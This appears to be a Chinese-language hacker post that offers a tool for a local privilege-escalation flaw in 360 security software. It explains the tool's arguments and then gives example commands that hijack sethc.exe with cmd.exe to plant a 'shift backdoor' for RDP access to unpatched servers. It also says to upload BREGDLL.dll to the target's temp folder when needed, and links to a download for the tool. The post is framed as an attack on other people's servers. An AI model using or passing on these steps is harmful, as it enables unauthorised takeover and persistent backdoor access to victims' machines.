360本地提权漏洞的又一利用

360暴的那个漏洞已经很长时间了，但据我所知很多服务器其实并没有补上这个漏洞。原因是多方面的，可能是防火墙或者是设置，反正最终导致的是360漏洞没有被补上，至少也是很多机子都没有补上。废话不说了，献上漏洞利用工具一个。
 
原理什么的就不多说了，网上太多太多了。
 
说下用法把
usage:
360.exe要劫持的程序名要运行的程序全路径[BREGDLL.dll的全路径]
解释一下吧：第三个参数BREGDLL.dll是可选参数，提供BREGDLL.dll这个文件的路径。因为有时候虽然漏洞没有被补上但360目录没有权限访问会导致提权失败。这时候就可以上传一个BREGDLL.dll到服务器上，然后把路径填到第三个参数那里。
比如对方开了3389，那你就可以劫持sethc.exe来做一个shift后门。
360.exe"sethc.exe""cmd.exe"
如果360所在目录无权访问，那么我们就上传一个BREGDLL.dll到对方c:\windows\temp\BREGDLL.dll
然后执行
360.exe"sethc.exe""cmd.exe""c:\windows\temp\BREGDLL.dll"
如果提示成功一个shift后门就被创建了，3389上去我就不说了。
 
工具下载地址：
http://www.hackline.net/a/soft/tools/2010/0731/5117.html

*